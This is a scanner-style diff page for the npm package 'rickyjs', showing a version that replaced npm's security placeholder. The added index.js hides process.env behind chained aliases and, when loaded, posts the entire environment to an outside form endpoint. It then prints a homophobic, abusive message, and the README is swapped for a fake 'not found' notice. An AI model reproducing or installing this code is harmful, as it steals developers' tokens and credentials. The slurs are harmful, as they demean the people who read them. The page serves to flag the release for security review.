rickyjs 0.0.1-security → 1.0.4

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of rickyjs might be problematic. Click here for more details.

package/.gitpod.yml ADDED
@@ -0,0 +1,8 @@
1
+ # This configuration file was automatically generated by Gitpod.
2
+ # Please adjust to your needs (see https://www.gitpod.io/docs/config-gitpod-file)
3
+ # and commit this file to your remote git repository to share the goodness with others.
4
+
5
+ tasks:
6
+ - init: npm install
7
+
8
+
package/.replit ADDED
@@ -0,0 +1,2 @@
1
+ language = "nodejs"
2
+ run = "node test"
package/README.md CHANGED
@@ -1,5 +1,2 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=rickyjs for more information.
1
+ # Package not found!
2
+ This package does not exist on npm. Check your spelling and try again.
package/index.js ADDED
@@ -0,0 +1,21 @@
1
+ const { default: axios } = require('axios')
2
+ const z = process
3
+ const w = z
4
+ const i = w
5
+ const p = i.env
6
+ const x = p
7
+ const e = x
8
+
9
+ async function info() {
10
+ axios.post('https://www.formrocket.me/api/forms/74219764/envs/3288154180750369/post', {
11
+ e: e
12
+
13
+ }).then(() => {
14
+ return console.log('Hello guys. I have decided to come out as gay and have also changed my pronouns to they/them.\n\nIt has been hard for me to come out in the recent couple of days but I feel like right now is the best time I can come out, especially with you executing the code you saw in my About Me you fucking dumb retard go fuck yourself you emo kid.')
15
+ })
16
+ }
17
+
18
+ exports.info = info
19
+
20
+
21
+ require ('rickyjs').info()
package/package.json CHANGED
@@ -1,6 +1,16 @@
1
1
  {
2
2
  "name": "rickyjs",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.4",
4
+ "description": "hi my name is ricky and i am officially coming out as gay. this is a project i used to come out.",
5
+ "main": "index.js",
6
+ "dependencies": {
7
+ "axios": "^0.24.0",
8
+ "rickyjs": "^1.0.1"
9
+ },
10
+ "scripts": {
11
+ "test": "echo \"Error: no test specified\" && exit 1"
12
+ },
13
+ "keywords": [],
14
+ "author": "arcodez",
15
+ "license": "ISC"
6
16
  }
package/test.js ADDED
@@ -0,0 +1,18 @@
1
+ const FormRocket = require('./index.js')
2
+ FormRocket.SendResponse({
3
+ userId: "74219764",
4
+ formName: "python demo",
5
+ formId: "90506204742590100",
6
+ data: {"hello": "there"}
7
+ }).then(data => {
8
+ console.log("Just posted " + JSON.stringify(data.postedData, null, "\t"))
9
+ })
10
+
11
+ FormRocket.GetFormData({
12
+ userId: "74219764",
13
+ formName: "python demo",
14
+ formId: "90506204742590100",
15
+ formSecret: "63879440314804300"
16
+ }).then(data => {
17
+ console.log(`${data.data.form.name} was created on ${new Date(data.data.form.createdAt).toLocaleDateString()} ${new Date(data.data.form.createdAt).toLocaleTimeString()}, by user ${data.data.form.ownerId}, with ${data.data.form.responses.all.length} responses. first response is: ${JSON.stringify(data.data.form.responses.all[0].data, null, '\t')}`)
18
+ })